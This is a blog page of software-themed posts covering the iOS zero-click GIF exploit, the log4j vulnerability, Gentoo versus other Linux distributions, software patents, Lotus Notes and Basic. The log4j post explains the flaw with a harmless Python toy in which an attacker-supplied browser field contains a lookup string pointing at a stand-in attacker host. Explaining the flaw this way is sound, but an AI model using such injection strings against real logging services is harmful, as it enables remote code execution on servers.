
Symbolic Forest

A homage to loading screens.

Blog : Posts tagged with ‘software’

Teaching an image to think

Computers work in unexpected ways

Following on from yesterday’s post about log4j: another security article fascinated me in the last week, too. You might have already seen it, because it was widely shared on Twitter and computer people everywhere were amazed and aghast at its engineering and its possibilities. The log4j vulnerability is a relatively pedestrian one by comparison, using something that is an entirely documented and public feature of the library. This, on the other hand, is a completely different animal.

It’s a hack which lets you run code on a stranger’s iPhone just by sending them a message. They don’t have to click on anything, they don’t even have to open it, all their phone has to do is receive it and the hacker can take their phone over. At least, could: this security hole was fixed three months ago, in iOS 14.8 and later. If you are running an older version of iOS on your phone or tablet, then, er, maybe don’t. The analysis of how this hack works, by Google Project Zero, has started to be published; and if you’re a programming nerd, it is beautiful and amazing and horrific in just the same way that a biological virus is.

In short, this hack relied on the fact that an iOS device, when it receives an animated GIF, tries to hack the GIF a little so it will always loop forever whatever the GIF itself actually says to do. It does this in an unhealthy way, though. When it opens the file to change it, it doesn’t matter if it’s not actually a GIF. The software will try to be clever and say “ah, looks like your file’s got the wrong name there, don’t worry, I still know how to open one of these” and do it. Even if it’s not a GIF and therefore doesn’t really need to.
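To make the “wrong name, never mind” behaviour concrete, here is a minimal sketch of choosing a decoder by looking at a file’s first few bytes rather than its name. It is only an illustration of the general idea, not Apple’s code: the `sniff_type` helper and the table of signatures are my own invention for the example.

```python
# Hypothetical helper: guess a file's real type from its first bytes,
# ignoring whatever name or extension the sender gave it.
MAGIC_NUMBERS = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"%PDF-": "pdf",
}


def sniff_type(data: bytes) -> str:
    """Return a type name based on the leading bytes, or 'unknown'."""
    for magic, name in MAGIC_NUMBERS.items():
        if data.startswith(magic):
            return name
    return "unknown"


# A PDF that has merely been *named* cat.gif is still recognised as a PDF.
filename, contents = "cat.gif", b"%PDF-1.4 ...rest of file..."
print(filename, "is really a", sniff_type(contents))
```

Software that works this way will cheerfully hand the “GIF” to its PDF code, which is exactly the sort of helpfulness that gives an attacker a route to a parser they shouldn’t be able to reach.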

Secondly, the hack relies on a bug in an open source PDF-reading library, in the part of the code used to open embedded images that are in an obscure and rather out-of-date format mostly used by fax machines. PDF is a big, complex and rambly format (believe me I know, I’ve been on-off trying to write a .NET PDF writing library for some years now) so it’s not surprising there are bugs and holes in PDF-reading software. What this hack does, though, is frankly brilliant. It uses the capabilities of the compression algorithm of this particular graphics format to implement an entire virtual CPU in the memory of the target device. It’s a small CPU but it is a Turing-complete one, which in technical terms means that if you ignore practical limits of time and memory, it’s just as powerful as any other computer. An entire virtual CPU…created by feeding a carefully-designed image into a buggy image decompression routine.*

Frankly, if you’re a software developer, this is genius. Evil genius, to be sure, but genius nonetheless. I’m somewhat in awe of it, in a dirty way. It’s a wonderful level of lateral thinking, to know that the bug is there to exploit and work out a way to reach it and trip it up to begin with; and then to build an entire virtual machine from the basic Boolean logic operations available inside a particular image format. As I said above, it’s beautiful, it’s amazing, and it’s horrific in the original sense of the word. It’s awe-inspiring. I might be good at my job, but I can only look upon this with amazement and envy.
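If it sounds implausible that a handful of Boolean operations can add up to a computer, here is a small sketch of the first rung on that ladder: an adder built from nothing but AND, OR and XOR. I’m assuming those three are the operations available; the function names are mine, and the bit shifts are only there to pick the numbers apart and put them back together. This is a toy in Python, nothing like the real exploit.

```python
def full_adder(a: int, b: int, carry_in: int) -> tuple[int, int]:
    """Add three single bits using only AND, OR and XOR."""
    partial = a ^ b
    total = partial ^ carry_in
    carry_out = (a & b) | (partial & carry_in)
    return total, carry_out


def add_bytes(x: int, y: int) -> int:
    """Add two 8-bit numbers one bit at a time, discarding any overflow."""
    result = 0
    carry = 0
    for i in range(8):
        bit, carry = full_adder((x >> i) & 1, (y >> i) & 1, carry)
        result |= bit << i
    return result


print(add_bytes(100, 55))  # 155
```

Once you can add, you can compare, count and step through memory, and from there it is “only” a matter of patience to reach something that deserves to be called a CPU.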

* I assume the image itself looks like just so much white noise if you could actually view it, but you can’t have everything. It reminds me a little of Neal Stephenson’s early-90s novel Snow Crash, in which a carefully-designed image that looks like white noise can hack the viewer’s brain.

Some logical relief

In which we discuss a topical flaw

In many ways I lead a charmed life and hold a wide range of privileges in my hand. Not least, this week just gone, the fact that I’m a software developer who generally works with the .NET software stack. More specifically, I am not a software developer who works with Java. Java developers have not, generally speaking, been having a good week.

This is all because of a software vulnerability discovered just over a week ago in a Java library called “log4j”. To summarise, for non-experts: “log4j” is a logging library. No, not the let’s-clear-the-rainforests sort. “Logging” means your software writing diagnostic information as it goes along: records such as “user etoainshrdlu asked to see their bank balance at 9.10am from this address with that web browser”. You can see why…

Regular reader E Shrdlu (from Clacton) writes: Oi! You can’t go around giving my bank balance to people!

Hush now, I was just using you as an example! You can see why it’s useful to have this information stored away somewhere, and log4j is a software library that makes it really easy to do. Virtually all Java server-side code out there uses log4j somewhere inside it, to handle this sort of thing.
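For anyone who has never seen logging in the flesh, this is roughly what it looks like, sketched with Python’s standard `logging` module rather than log4j itself. The logger name, the address and the browser string are made up for the example.

```python
import io
import logging

# Write log records to an in-memory buffer so the example is self-contained;
# a real service would log to a file or to a log collector.
buffer = io.StringIO()
handler = logging.StreamHandler(buffer)
handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))

logger = logging.getLogger("bank.example")  # hypothetical logger name
logger.setLevel(logging.INFO)
logger.addHandler(handler)
logger.propagate = False


def log_balance_request(user: str, address: str, browser: str) -> None:
    """Record who asked for their balance, from where, and with what browser."""
    logger.info(
        "user %s asked to see their balance from %s using %s",
        user, address, browser,
    )


log_balance_request("etoainshrdlu", "203.0.113.7", "ExampleBrowser/1.0")
print(buffer.getvalue(), end="")
```

Note that two of those three values come straight from the outside world.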

Unfortunately, log4j has a few features that were originally intended to be handy, but aren’t necessarily a good idea to have running on an internet-facing server that does important work such as processing your banking requests. Particularly, in this case, if you put a certain specialist type of URL into a log record, log4j will see it, try to download another program from it, and will then run that program in a certain well-defined way. Of course, you might say, there’s nothing wrong with that because all of the log record messages are just written by the bank’s own software developers, so everything’s perfectly safe. However, as I said above, one thing they may very well be logging is which browser you happen to be using, because that’s very useful diagnostic data if people start having problems. “Which browser you happen to be using”, though, is just a field that you send them, and if you know what you’re doing, you can change it to whatever you want to. Including a special type of URL which will…well, hopefully you get the picture. And now you’re running whatever programs you like on one of your bank’s internal servers. Ah. You can see now why Java developers have not been having a good week.
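Here is a deliberately harmless toy version of that mistake, to show its shape. It is not log4j’s code or its real syntax: the `${lookup:...}` form, `naive_log` and `resolve_lookup` are all hypothetical names for this sketch, and the “download and run” step is replaced by simply noting that a lookup was asked for.

```python
import re

# Stand-in for "download a program from this URL and run it". Here it only
# records that a lookup was attempted, so the sketch is harmless.
lookups_attempted = []


def resolve_lookup(expression: str) -> str:
    lookups_attempted.append(expression)
    return f"<result of {expression}>"


LOOKUP_PATTERN = re.compile(r"\$\{([^}]*)\}")


def naive_log(message: str) -> str:
    """Toy logger that expands ${...} anywhere in the finished message."""
    return LOOKUP_PATTERN.sub(lambda m: resolve_lookup(m.group(1)), message)


def safer_log(message: str) -> str:
    """Toy logger that treats the whole message as plain text."""
    return message


# The "browser" field is whatever the client chooses to send.
browser = "${lookup:http://attacker.example/payload}"
line = f"balance request using browser {browser}"

naive_log(line)
print(lookups_attempted)
```

The developer who wrote the log statement never typed a lookup expression; the visitor did, and the naive logger couldn’t tell the difference.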

The fix for this is straightforward, but rolling the fix out will have involved a huge proportion of the Java code running in the world being checked, double-checked, and redeployed when it’s known to be safe. Moreover, all of the developers doing this will have had several queries a day from their managers asking just how much they are exposed to this issue. I know: I’ve had several myself, even though my response is straightforwardly “we don’t run any Java code at all, so don’t worry.” I do tell them to tell the clients we have thoroughly and conscientiously audited our systems because from a client-relations point of view it does sound a bit more professional than “no, and our tech lead is very glad of their career choices”. But it still means plenty of messages for me to answer.

Incidentally, I don’t feel any sort of schadenfreude about this, in case you were wondering. I genuinely feel sorry for a lot of people I know, who will not have had a good week fixing this stuff. I’ve worked in big banks and other similar organisations, and I know a lot of former colleagues and current friends who will have spent the last week focusing on this above all else. It’s not nice when you are suddenly bowled by a risk like this; and moreover, it’s not as if Java is uniquely likely to suffer from this type of problem. There are nuances to this that I may come back to in a later post; but next time something like this happens, the person fixing it might well be me.

Hello, Operator

In which we consider switching OS

Right, that’s enough of politics. For now, at least, until something else pops up and ires me.

Back onto even shakier ground, so far as quasi-religious strength of feeling goes. I’m having doubts. About my operating system.

Back in about 1998 or so, I installed Linux on my PC. There was one big reason behind it: Microsoft Word 97. Word 97, as far as I can remember it, was a horribly bug-ridden release; in particular, when you printed out a long document, it would skip random pages. I was due to write a 12,000 word dissertation, with long appendices and bibliography,* and I didn’t trust Word to do it. I’d had a flatmate who had tackled the same problem using Linux and LaTeX, so I went down the same route. Once it was all set up, and I’d written a LaTeX template to handle the university’s dissertation- and bibliography-formatting rules, everything went smoothly. And I’ve been a happy Linux user ever since.

Now, I’m not going to move away from Linux. I like Linux, I like the level of control it gives me over the PC, and the only Windows-only programs I use run happily under Wine. What I’m not sure about, though, is the precise flavour of Linux I use.

For most of the past decade, I’ve used Gentoo Linux. I picked up on it about a year after it first appeared, and liked what I saw: it gives the system’s installer a huge amount of control over what software gets installed and how it’s configured. It does this in a slightly brutal way, by building a program’s binaries from scratch when it’s installed; but that makes it very easy to install a minimal system, or a specialist system, or a system with exactly the applications, subsystems and dependencies that you want.

There are two big downsides to this. Firstly, it makes installs and updates rather slow; on my 4-year-old computer, it can take a few hours to grind through an install of Gnome or X. Secondly, although the developers do their best, there’s no way to check the stability of absolutely every possible Gentoo installation out there, and quite frequently, when a new update is released, something will break.**

I’m getting a bit bored of the number of times in the last few months that I’ve done a big update, then found that something is broken. Sometimes it’s something major; only being able to log in via SSH, for example, because X can’t see my keyboard any more.*** It can be something as simple as a single application being broken, because something it depends on has changed. It turns “checking for updates” into a bit of a tedious multi-step process. I do like using Gentoo, but I’m wondering if life would be easier if I switched over to Ubuntu, or Debian, or some other precompiled Linux that didn’t have Gentoo’s dependency problems.

So: should I change or should I stay? Can I be bothered to do a full reinstall of everything? What, essentially, would I gain, that wouldn’t be gained from any nice, clean newly-installed computer? And is it worth losing the capacity to endlessly tinker that Gentoo gives you? I’m going to have to have a ponder.

UPDATE: thanks to K for pointing out that the original closing “should I change or should I go?” doesn’t really make much sense as a contrast.

* The appendices took up the majority of the page count, in the end, because of the number of illustrations and diagrams they contained.

** Before any Gentoo-lovers write in: yes, I am using stable packages, and I do read the news items every time I run “emerge --sync”.

*** I was lucky there that SSH was turned on, in fact; otherwise I’d have had to start up and break into the boot sequence before GDM was started.

Legal news

In which Microsoft are on the good side for once

Legal news of the week: Microsoft has lost a patent infringement case brought by Alcatel, the company that owns the rights to the MP3. That is, they don’t own the file format itself, but they own the patent on understanding what the files mean.

Now, normally, “Microsoft losing a court case” would be Good News for computer users everywhere, because Microsoft generally aren’t a very nice company and seem to spend most of their time thinking up new ways to extract money from people.* This case isn’t, though, because software patents are a bad thing, a bad thing indeed. If you’re a geek you can skip this next bit, because you’ll already know why they’re a bad thing.

Software is, basically, a list of instructions for doing arithmetic. Forget all the flashy graphics you see on the screen. Forget your email and your IM programs. Computers are machines for pushing numbers around,** and computer software is a list of instructions for doing that. Remember doing long division at school? That was essentially a list of steps for working out division sums that are too hard to do in your head – software for your brain, in other words.
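To labour the point, here is schoolroom long division written down as actual software. It’s a sketch of the pencil-and-paper method for whole numbers only; the function name is mine.

```python
def long_division(dividend: int, divisor: int) -> tuple[int, int]:
    """Divide digit by digit, the way it is done on paper.

    Returns (quotient, remainder) for a non-negative dividend
    and a positive divisor.
    """
    if dividend < 0 or divisor <= 0:
        raise ValueError("expects dividend >= 0 and divisor > 0")
    quotient_digits = []
    remainder = 0
    for digit in str(dividend):
        # "Bring down" the next digit.
        remainder = remainder * 10 + int(digit)
        # How many times does the divisor go into the running remainder?
        count = 0
        while remainder >= divisor:
            remainder -= divisor
            count += 1
        quotient_digits.append(str(count))
    return int("".join(quotient_digits)), remainder


print(long_division(7425, 12))  # (618, 9)
```

Every step in there is one you were taught at school; the computer is just less likely to lose its place.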

Now, imagine if the inventor of long division*** had patented it. Every time you did a long division sum, you’d have to pay him a royalty. If you invented a machine to do long divisions for you, you’d have to pay a bloody big royalty. That’s how patents work.

Software patents are even worse, because often they involve access to data which is otherwise locked up. All those MP3 files on your computer? There’s no practical use for them without decoding software. Decoding software is patented. Microsoft thought they’d paid the patent holders for the right to write a decoder and sell it with Windows – but then the patent holder changed, and the new owner thought otherwise. The courts agreed with them.

Imagine if the first person who ever thought of the idea of reading a book in the bath had patented it. They managed to get a patent on the following: “run bath, select book, get in bath, pick up book, hold book in a cunning way to avoid getting it wet, read.” That’s no different, essentially, from a software patent that involves reading data from a file. If someone had done that, then you could only read a book in the bath if you’d licensed the right to do so. That’s why software patents are bad and wrong.

In more amusing legal news, the right-wing UK Independence Party has been told to return over £350,000 in illegal donations, made by a businessman who wasn’t registered to vote at the time. The party think the ruling is ridiculous. It shines a light, though, on the underside of their philosophy. There are rules there to ensure that only British people with a stake in British politics can fund political parties. UKIP think the ruling is silly because the man is obviously British even though he couldn’t prove he was a British voter. Which just goes to show that they’re not interested in proof or evidence or process; their definition of Britishness seems to be that you’re Someone Like Us.

* which, to be fair, is what capitalist companies are supposed to do.

** that’s why they’re called “computers”, and not “communicators” or “info-readers”, despite that being their main use.

*** apparently the sixteenth-century Yorkshire mathematician Henry Briggs, according to this lecture from his old college

On sucking

In which we discuss some design flaws in Lotus Notes

Spent quite a while last night reading Lotus Notes Sucks***, a collection of reasons why, as you could probably guess, Lotus Notes sucks. I have to use the thing at work every day, and it is indeed truly awful; but I didn’t really like the site. It lists 80-something superficial bad things about Lotus Notes, without listing any of the truly awful things about it.

Aside from the slightly smug nature of the site – every entry on it ends with “Conclusion: Lotus Notes Sucks”, repeated over and over again with the subtlety of a 10-ton cartoon weight – it’s written solely from the point of view of someone who uses Lotus Notes purely as an email program. That is, to be fair, probably what most people use it for; but that’s not what it is. It’s really a generic NoSQL non-relational database and data-sharing program that has been shoehorned into an email mould, and doesn’t properly fit. So, all the complaints are fairly trivial ones, and a lot boil down to: “it’s slightly different to Outlook”.

There are some true horrors inside Lotus Notes, if you ever have to do any programming or development work with it. The help files, for example, are all just specialised Notes data stores with a suitable interface on the front. This is completely fine, right up until you have a buggy bit of program code that you want to step through in the debugger.* If you’re running something in the debugger, you can’t access any other Notes data. Which, stupidly, includes the help files. Programmers have no access at all to the help files at the very time they’re most likely to need them.

There are other horrible things too. Things go wrong in unfixable ways. Files can mysteriously corrupt themselves and be unrepairable. If a file is deleted, shortcuts to it can become undeletable. If you accidentally delete half your email and ask your IT people to recover it from a backup, then unless IT knows the necessary cunning tricks,** when you open the backup copy of your mail file Notes will happily go “aha! this is the same datastore, but it’s out of date!” and delete everything in the backup too. Oh, joy. Lotus Notes Sucks doesn’t even mention some non-programming problems that I thought were obvious: you can’t search for empty fields, for example. You can search for documents where Field X contains “wibble”, no problem, but you can’t search for documents where Field X is blank. Well, you can do it if you’re a programmer and you write some code to do it for you, but there’s no way to trick the normal search interface into doing it.

In short, Lotus Notes is a horrible can of worms which will trip you up whenever you try to do something the programmers didn’t think of. So it’s a shame that Lotus Notes Sucks finds so many trivial surface-level problems with the email part of the program, when if you try to do more than just email with it, there are so many deeper faults lurking under the surface.

* Don’t worry if you don’t understand this. It means: run the program one line at a time so you can spot the point where it all goes wrong leading to your program falling over.

** Which we do, the second time someone does it, of course

*** Update, 27th August 2020: the site I originally linked to here has sadly disappeared.

Masochism

In which we go back to BASICs

No, I’m not a masochist.

I take a strange, geeky, masochistic pleasure, though, in making things hard for myself. In doing computer-based things the long way round. In solving the problems that are probably easy for some people, but hard for me. In learning new things just because it’s a new challenge.

Today, I was wrestling with a piece of Basic code in an Excel spreadsheet. I’ve not touched Basic since it had line numbers, which is a long long time ago, and I barely know any of it. I forced myself to work out, though, how to do what I wanted.* It was mentally hard work, and meant a lot of looking back and forth to the help pages, but I got it done in the end. It might not be written in the best way, the most efficient way, or the most idiomatic way.** But doing it was, strangely, fun.

* or, rather, what the consultant I was assisting wanted.

** for non-geeks: every computer language or system has its own programming idioms, which fit certain ways of programming particular problems. Someone used to language A will, on switching to language Z, often keep on programming in language A’s style even if this produces ugly and inefficient code in the other language.
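As a small illustration of that last footnote, here is the same job done twice in Python: once the way someone fresh from line-numbered Basic might write it, and once the way a Python regular probably would. Both functions and the list of numbers are invented for the example.

```python
prices = [4, 8, 15, 16, 23, 42]


def total_over_ten_basic_style(values):
    """Manual counter and index, much as you would write it in old Basic."""
    total = 0
    i = 0
    while i < len(values):
        if values[i] > 10:
            total = total + values[i]
        i = i + 1
    return total


def total_over_ten_idiomatic(values):
    """The same sum written with a generator expression."""
    return sum(v for v in values if v > 10)


print(total_over_ten_basic_style(prices), total_over_ten_idiomatic(prices))  # 96 96
```

Both give the same answer; only one of them looks at home.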